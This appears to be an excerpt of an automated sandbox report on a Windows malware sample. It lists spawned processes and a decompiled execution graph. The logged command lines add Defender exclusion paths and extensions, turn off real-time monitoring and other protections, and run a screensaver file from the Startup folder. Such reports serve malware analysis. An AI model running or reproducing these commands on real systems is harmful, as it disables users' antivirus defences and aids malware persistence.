                                                                                                    MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    Target ID:12
                                                                                                    Start time:02:36:33
                                                                                                    Start date:07/11/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""
                                                                                                    Imagebase:0x7ff610c60000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:13
                                                                                                    Start time:02:36:33
                                                                                                    Start date:07/11/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:14
                                                                                                    Start time:02:36:33
                                                                                                    Start date:07/11/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\AppData"
                                                                                                    Imagebase:0x7ff788560000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:15
                                                                                                    Start time:02:36:35
                                                                                                    Start date:07/11/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\Local"
                                                                                                    Imagebase:0x7ff788560000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:16
                                                                                                    Start time:02:36:37
                                                                                                    Start date:07/11/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'"
                                                                                                    Imagebase:0x7ff788560000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:17
                                                                                                    Start time:02:36:39
                                                                                                    Start date:07/11/2024
                                                                                                    Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr" /S
                                                                                                    Imagebase:0x7ff757130000
                                                                                                    File size:61'460'987 bytes
                                                                                                    MD5 hash:75F2C40C5FD05B5824D88867C17AFB49
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:18
                                                                                                    Start time:02:36:49
                                                                                                    Start date:07/11/2024
                                                                                                    Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr" /S
                                                                                                    Imagebase:0x7ff757130000
                                                                                                    File size:61'460'987 bytes
                                                                                                    MD5 hash:75F2C40C5FD05B5824D88867C17AFB49
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:19
                                                                                                    Start time:02:37:07
                                                                                                    Start date:07/11/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
                                                                                                    Imagebase:0x7ff610c60000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:20
                                                                                                    Start time:02:37:07
                                                                                                    Start date:07/11/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:21
                                                                                                    Start time:02:37:07
                                                                                                    Start date:07/11/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                    Imagebase:0x7ff788560000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:22
                                                                                                    Start time:02:37:08
                                                                                                    Start date:07/11/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "ver"
                                                                                                    Imagebase:0x7ff610c60000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:23
                                                                                                    Start time:02:37:08
                                                                                                    Start date:07/11/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:25
                                                                                                    Start time:02:37:18
                                                                                                    Start date:07/11/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""
                                                                                                    Imagebase:0x7ff610c60000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:26
                                                                                                    Start time:02:37:18
                                                                                                    Start date:07/11/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:27
                                                                                                    Start time:02:37:18
                                                                                                    Start date:07/11/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\AppData"
                                                                                                    Imagebase:0x7ff788560000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:29
                                                                                                    Start time:02:37:19
                                                                                                    Start date:07/11/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\Local"
                                                                                                    Imagebase:0x7ff788560000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:31
                                                                                                    Start time:02:37:21
                                                                                                    Start date:07/11/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'"
                                                                                                    Imagebase:0x7ff788560000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Reset < >

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:10.4%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:17.1%
                                                                                                      Total number of Nodes:2000
                                                                                                      Total number of Limit Nodes:29
                                                                                                      execution_graph 19580 7ff6c821ad69 19583 7ff6c8205478 LeaveCriticalSection 19580->19583 16826 7ff6c81fbae0 16827 7ff6c81fbb0e 16826->16827 16828 7ff6c81fbaf5 16826->16828 16828->16827 16830 7ff6c820d5fc 12 API calls 16828->16830 16829 7ff6c81fbb6e 16830->16829 19421 7ff6c8209961 19422 7ff6c820a3d8 45 API calls 19421->19422 19423 7ff6c8209966 19422->19423 19424 7ff6c82099d7 19423->19424 19425 7ff6c820998d GetModuleHandleW 19423->19425 19433 7ff6c8209864 19424->19433 19425->19424 19431 7ff6c820999a 19425->19431 19431->19424 19447 7ff6c8209a88 GetModuleHandleExW 19431->19447 19453 7ff6c82102d8 EnterCriticalSection 19433->19453 19448 7ff6c8209abc GetProcAddress 19447->19448 19449 7ff6c8209ae5 19447->19449 19450 7ff6c8209ace 19448->19450 19451 7ff6c8209aea FreeLibrary 19449->19451 19452 7ff6c8209af1 19449->19452 19450->19449 19451->19452 19452->19424 19850 7ff6c821abe3 19851 7ff6c821abf3 19850->19851 19854 7ff6c8205478 LeaveCriticalSection 19851->19854 16014 7ff6c82108c8 16015 7ff6c82108ec 16014->16015 16017 7ff6c82108fc 16014->16017 16165 7ff6c8204f08 16015->16165 16018 7ff6c8210bdc 16017->16018 16019 7ff6c821091e 16017->16019 16020 7ff6c8204f08 _get_daylight 11 API calls 16018->16020 16021 7ff6c821093f 16019->16021 16168 7ff6c8210f84 16019->16168 16022 7ff6c8210be1 16020->16022 16025 7ff6c82109b1 16021->16025 16026 7ff6c8210965 16021->16026 16031 7ff6c82109a5 16021->16031 16024 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16022->16024 16039 7ff6c82108f1 16024->16039 16028 7ff6c820eb98 _get_daylight 11 API calls 16025->16028 16043 7ff6c8210974 16025->16043 16183 7ff6c82096c0 16026->16183 16027 7ff6c8210a5e 16038 7ff6c8210a7b 16027->16038 16044 7ff6c8210acd 16027->16044 16032 7ff6c82109c7 16028->16032 16031->16027 16031->16043 16195 7ff6c821712c 16031->16195 16035 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16032->16035 16040 7ff6c82109d5 16035->16040 16036 7ff6c821098d 16036->16031 16046 7ff6c8210f84 45 API calls 16036->16046 16037 7ff6c821096f 16041 7ff6c8204f08 _get_daylight 11 API calls 16037->16041 16042 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16038->16042 16040->16031 16040->16043 16048 7ff6c820eb98 _get_daylight 11 API calls 16040->16048 16041->16043 16045 7ff6c8210a84 16042->16045 16189 7ff6c820a948 16043->16189 16044->16043 16047 7ff6c82133dc 40 API calls 16044->16047 16053 7ff6c8210a89 16045->16053 16231 7ff6c82133dc 16045->16231 16046->16031 16049 7ff6c8210b0a 16047->16049 16050 7ff6c82109f7 16048->16050 16051 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16049->16051 16056 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16050->16056 16057 7ff6c8210b14 16051->16057 16054 7ff6c8210bd0 16053->16054 16145 7ff6c820eb98 16053->16145 16059 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16054->16059 16055 7ff6c8210ab5 16058 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16055->16058 16056->16031 16057->16043 16057->16053 16058->16053 16059->16039 16062 7ff6c8210b69 16152 7ff6c820a4a4 16062->16152 16063 7ff6c8210b60 16064 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16063->16064 16066 7ff6c8210b67 16064->16066 16071 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16066->16071 16068 7ff6c8210c0b 16161 7ff6c820a900 IsProcessorFeaturePresent 16068->16161 16069 7ff6c8210b80 16240 7ff6c8217244 16069->16240 16071->16039 16076 7ff6c8210ba7 16080 7ff6c8204f08 _get_daylight 11 API calls 16076->16080 16077 7ff6c8210bc8 16079 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16077->16079 16079->16054 16081 7ff6c8210bac 16080->16081 16082 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16081->16082 16082->16066 16151 7ff6c820eba9 _get_daylight 16145->16151 16146 7ff6c820ebfa 16149 7ff6c8204f08 _get_daylight 10 API calls 16146->16149 16147 7ff6c820ebde HeapAlloc 16148 7ff6c820ebf8 16147->16148 16147->16151 16148->16062 16148->16063 16149->16148 16151->16146 16151->16147 16259 7ff6c8213590 16151->16259 16153 7ff6c820a4bb 16152->16153 16154 7ff6c820a4b1 16152->16154 16155 7ff6c8204f08 _get_daylight 11 API calls 16153->16155 16154->16153 16158 7ff6c820a4d6 16154->16158 16160 7ff6c820a4c2 16155->16160 16156 7ff6c820a4ce 16156->16068 16156->16069 16158->16156 16159 7ff6c8204f08 _get_daylight 11 API calls 16158->16159 16159->16160 16268 7ff6c820a8e0 16160->16268 16162 7ff6c820a913 16161->16162 16330 7ff6c820a614 16162->16330 16352 7ff6c820b2c8 GetLastError 16165->16352 16167 7ff6c8204f11 16167->16039 16169 7ff6c8210fb9 16168->16169 16176 7ff6c8210fa1 16168->16176 16170 7ff6c820eb98 _get_daylight 11 API calls 16169->16170 16179 7ff6c8210fdd 16170->16179 16171 7ff6c8211062 16369 7ff6c820a504 16171->16369 16172 7ff6c821103e 16174 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16172->16174 16174->16176 16176->16021 16177 7ff6c820eb98 _get_daylight 11 API calls 16177->16179 16178 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16178->16179 16179->16171 16179->16172 16179->16177 16179->16178 16180 7ff6c820a4a4 __std_exception_copy 37 API calls 16179->16180 16181 7ff6c821104d 16179->16181 16180->16179 16182 7ff6c820a900 _isindst 17 API calls 16181->16182 16182->16171 16184 7ff6c82096d0 16183->16184 16187 7ff6c82096d9 16183->16187 16184->16187 16435 7ff6c8209198 16184->16435 16187->16036 16187->16037 16190 7ff6c820a94d RtlFreeHeap 16189->16190 16192 7ff6c820a97c 16189->16192 16191 7ff6c820a968 GetLastError 16190->16191 16190->16192 16193 7ff6c820a975 Concurrency::details::SchedulerProxy::DeleteThis 16191->16193 16192->16039 16194 7ff6c8204f08 _get_daylight 9 API calls 16193->16194 16194->16192 16196 7ff6c8217139 16195->16196 16197 7ff6c8216254 16195->16197 16199 7ff6c8204f4c 45 API calls 16196->16199 16198 7ff6c8216261 16197->16198 16206 7ff6c8216297 16197->16206 16202 7ff6c8204f08 _get_daylight 11 API calls 16198->16202 16215 7ff6c8216208 16198->16215 16201 7ff6c821716d 16199->16201 16200 7ff6c82162c1 16203 7ff6c8204f08 _get_daylight 11 API calls 16200->16203 16204 7ff6c8217172 16201->16204 16208 7ff6c8217183 16201->16208 16212 7ff6c821719a 16201->16212 16205 7ff6c821626b 16202->16205 16207 7ff6c82162c6 16203->16207 16204->16031 16209 7ff6c820a8e0 _invalid_parameter_noinfo 37 API calls 16205->16209 16206->16200 16210 7ff6c82162e6 16206->16210 16211 7ff6c820a8e0 _invalid_parameter_noinfo 37 API calls 16207->16211 16213 7ff6c8204f08 _get_daylight 11 API calls 16208->16213 16214 7ff6c8216276 16209->16214 16219 7ff6c8204f4c 45 API calls 16210->16219 16221 7ff6c82162d1 16210->16221 16211->16221 16217 7ff6c82171b6 16212->16217 16218 7ff6c82171a4 16212->16218 16216 7ff6c8217188 16213->16216 16214->16031 16215->16031 16224 7ff6c820a8e0 _invalid_parameter_noinfo 37 API calls 16216->16224 16222 7ff6c82171c7 16217->16222 16223 7ff6c82171de 16217->16223 16220 7ff6c8204f08 _get_daylight 11 API calls 16218->16220 16219->16221 16225 7ff6c82171a9 16220->16225 16221->16031 16728 7ff6c82162a4 16222->16728 16737 7ff6c8218f4c 16223->16737 16224->16204 16228 7ff6c820a8e0 _invalid_parameter_noinfo 37 API calls 16225->16228 16228->16204 16230 7ff6c8204f08 _get_daylight 11 API calls 16230->16204 16232 7ff6c821341b 16231->16232 16233 7ff6c82133fe 16231->16233 16237 7ff6c8213425 16232->16237 16777 7ff6c8217c38 16232->16777 16233->16232 16234 7ff6c821340c 16233->16234 16235 7ff6c8204f08 _get_daylight 11 API calls 16234->16235 16239 7ff6c8213411 memcpy_s 16235->16239 16784 7ff6c8217c74 16237->16784 16239->16055 16241 7ff6c8204f4c 45 API calls 16240->16241 16242 7ff6c82172aa 16241->16242 16243 7ff6c82172b8 16242->16243 16796 7ff6c820ef24 16242->16796 16799 7ff6c82054ac 16243->16799 16247 7ff6c82173a4 16250 7ff6c82173b5 16247->16250 16251 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16247->16251 16248 7ff6c8204f4c 45 API calls 16249 7ff6c8217327 16248->16249 16253 7ff6c820ef24 5 API calls 16249->16253 16256 7ff6c8217330 16249->16256 16252 7ff6c8210ba3 16250->16252 16254 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16250->16254 16251->16250 16252->16076 16252->16077 16253->16256 16254->16252 16255 7ff6c82054ac 14 API calls 16257 7ff6c821738b 16255->16257 16256->16255 16257->16247 16258 7ff6c8217393 SetEnvironmentVariableW 16257->16258 16258->16247 16262 7ff6c82135d0 16259->16262 16267 7ff6c82102d8 EnterCriticalSection 16262->16267 16271 7ff6c820a778 16268->16271 16270 7ff6c820a8f9 16270->16156 16272 7ff6c820a7a3 16271->16272 16275 7ff6c820a814 16272->16275 16274 7ff6c820a7ca 16274->16270 16285 7ff6c820a55c 16275->16285 16279 7ff6c820a84f 16279->16274 16281 7ff6c820a900 _isindst 17 API calls 16282 7ff6c820a8df 16281->16282 16283 7ff6c820a778 _invalid_parameter_noinfo 37 API calls 16282->16283 16284 7ff6c820a8f9 16283->16284 16284->16274 16286 7ff6c820a578 GetLastError 16285->16286 16287 7ff6c820a5b3 16285->16287 16288 7ff6c820a588 16286->16288 16287->16279 16291 7ff6c820a5c8 16287->16291 16294 7ff6c820b390 16288->16294 16292 7ff6c820a5fc 16291->16292 16293 7ff6c820a5e4 GetLastError SetLastError 16291->16293 16292->16279 16292->16281 16293->16292 16295 7ff6c820b3ca FlsSetValue 16294->16295 16296 7ff6c820b3af FlsGetValue 16294->16296 16298 7ff6c820b3d7 16295->16298 16300 7ff6c820a5a3 SetLastError 16295->16300 16297 7ff6c820b3c4 16296->16297 16296->16300 16297->16295 16299 7ff6c820eb98 _get_daylight 11 API calls 16298->16299 16301 7ff6c820b3e6 16299->16301 16300->16287 16302 7ff6c820b404 FlsSetValue 16301->16302 16303 7ff6c820b3f4 FlsSetValue 16301->16303 16305 7ff6c820b410 FlsSetValue 16302->16305 16306 7ff6c820b422 16302->16306 16304 7ff6c820b3fd 16303->16304 16307 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16304->16307 16305->16304 16311 7ff6c820aef4 16306->16311 16307->16300 16316 7ff6c820adcc 16311->16316 16328 7ff6c82102d8 EnterCriticalSection 16316->16328 16331 7ff6c820a64e __CxxCallCatchBlock memcpy_s 16330->16331 16332 7ff6c820a676 RtlCaptureContext RtlLookupFunctionEntry 16331->16332 16333 7ff6c820a6e6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16332->16333 16334 7ff6c820a6b0 RtlVirtualUnwind 16332->16334 16335 7ff6c820a738 __CxxCallCatchBlock 16333->16335 16334->16333 16338 7ff6c81fc550 16335->16338 16339 7ff6c81fc559 16338->16339 16340 7ff6c81fc8e0 IsProcessorFeaturePresent 16339->16340 16341 7ff6c81fc564 GetCurrentProcess TerminateProcess 16339->16341 16342 7ff6c81fc8f8 16340->16342 16347 7ff6c81fcad8 RtlCaptureContext 16342->16347 16348 7ff6c81fcaf2 RtlLookupFunctionEntry 16347->16348 16349 7ff6c81fc90b 16348->16349 16350 7ff6c81fcb08 RtlVirtualUnwind 16348->16350 16351 7ff6c81fc8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16349->16351 16350->16348 16350->16349 16353 7ff6c820b309 FlsSetValue 16352->16353 16358 7ff6c820b2ec 16352->16358 16354 7ff6c820b2f9 16353->16354 16355 7ff6c820b31b 16353->16355 16356 7ff6c820b375 SetLastError 16354->16356 16357 7ff6c820eb98 _get_daylight 5 API calls 16355->16357 16356->16167 16359 7ff6c820b32a 16357->16359 16358->16353 16358->16354 16360 7ff6c820b348 FlsSetValue 16359->16360 16361 7ff6c820b338 FlsSetValue 16359->16361 16362 7ff6c820b366 16360->16362 16363 7ff6c820b354 FlsSetValue 16360->16363 16364 7ff6c820b341 16361->16364 16365 7ff6c820aef4 _get_daylight 5 API calls 16362->16365 16363->16364 16366 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16364->16366 16367 7ff6c820b36e 16365->16367 16366->16354 16368 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16367->16368 16368->16356 16378 7ff6c8213650 16369->16378 16404 7ff6c8213608 16378->16404 16409 7ff6c82102d8 EnterCriticalSection 16404->16409 16436 7ff6c82091ad 16435->16436 16437 7ff6c82091b1 16435->16437 16436->16187 16450 7ff6c82094ec 16436->16450 16458 7ff6c82125f0 16437->16458 16442 7ff6c82091cf 16484 7ff6c820927c 16442->16484 16443 7ff6c82091c3 16444 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16443->16444 16444->16436 16447 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16448 7ff6c82091f6 16447->16448 16449 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16448->16449 16449->16436 16451 7ff6c8209515 16450->16451 16456 7ff6c820952e 16450->16456 16451->16187 16452 7ff6c820eb98 _get_daylight 11 API calls 16452->16456 16453 7ff6c82095be 16455 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16453->16455 16454 7ff6c82107e8 WideCharToMultiByte 16454->16456 16455->16451 16456->16451 16456->16452 16456->16453 16456->16454 16457 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16456->16457 16457->16456 16459 7ff6c82091b6 16458->16459 16460 7ff6c82125fd 16458->16460 16464 7ff6c821292c GetEnvironmentStringsW 16459->16464 16503 7ff6c820b224 16460->16503 16465 7ff6c821295c 16464->16465 16466 7ff6c82091bb 16464->16466 16467 7ff6c82107e8 WideCharToMultiByte 16465->16467 16466->16442 16466->16443 16468 7ff6c82129ad 16467->16468 16469 7ff6c82129b4 FreeEnvironmentStringsW 16468->16469 16470 7ff6c820d5fc _fread_nolock 12 API calls 16468->16470 16469->16466 16471 7ff6c82129c7 16470->16471 16472 7ff6c82129d8 16471->16472 16473 7ff6c82129cf 16471->16473 16475 7ff6c82107e8 WideCharToMultiByte 16472->16475 16474 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16473->16474 16476 7ff6c82129d6 16474->16476 16477 7ff6c82129fb 16475->16477 16476->16469 16478 7ff6c8212a09 16477->16478 16479 7ff6c82129ff 16477->16479 16481 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16478->16481 16480 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16479->16480 16482 7ff6c8212a07 FreeEnvironmentStringsW 16480->16482 16481->16482 16482->16466 16485 7ff6c82092a1 16484->16485 16486 7ff6c820eb98 _get_daylight 11 API calls 16485->16486 16497 7ff6c82092d7 16486->16497 16487 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16488 7ff6c82091d7 16487->16488 16488->16447 16489 7ff6c8209352 16490 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16489->16490 16490->16488 16491 7ff6c820eb98 _get_daylight 11 API calls 16491->16497 16492 7ff6c8209341 16722 7ff6c82094a8 16492->16722 16493 7ff6c820a4a4 __std_exception_copy 37 API calls 16493->16497 16496 7ff6c8209377 16499 7ff6c820a900 _isindst 17 API calls 16496->16499 16497->16489 16497->16491 16497->16492 16497->16493 16497->16496 16500 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16497->16500 16501 7ff6c82092df 16497->16501 16498 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16498->16501 16502 7ff6c820938a 16499->16502 16500->16497 16501->16487 16504 7ff6c820b250 FlsSetValue 16503->16504 16505 7ff6c820b235 FlsGetValue 16503->16505 16507 7ff6c820b242 16504->16507 16508 7ff6c820b25d 16504->16508 16506 7ff6c820b24a 16505->16506 16505->16507 16506->16504 16509 7ff6c820b248 16507->16509 16510 7ff6c820a504 __CxxCallCatchBlock 45 API calls 16507->16510 16511 7ff6c820eb98 _get_daylight 11 API calls 16508->16511 16523 7ff6c82122c4 16509->16523 16512 7ff6c820b2c5 16510->16512 16513 7ff6c820b26c 16511->16513 16514 7ff6c820b28a FlsSetValue 16513->16514 16515 7ff6c820b27a FlsSetValue 16513->16515 16516 7ff6c820b296 FlsSetValue 16514->16516 16517 7ff6c820b2a8 16514->16517 16518 7ff6c820b283 16515->16518 16516->16518 16519 7ff6c820aef4 _get_daylight 11 API calls 16517->16519 16520 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16518->16520 16521 7ff6c820b2b0 16519->16521 16520->16507 16522 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16521->16522 16522->16509 16546 7ff6c8212534 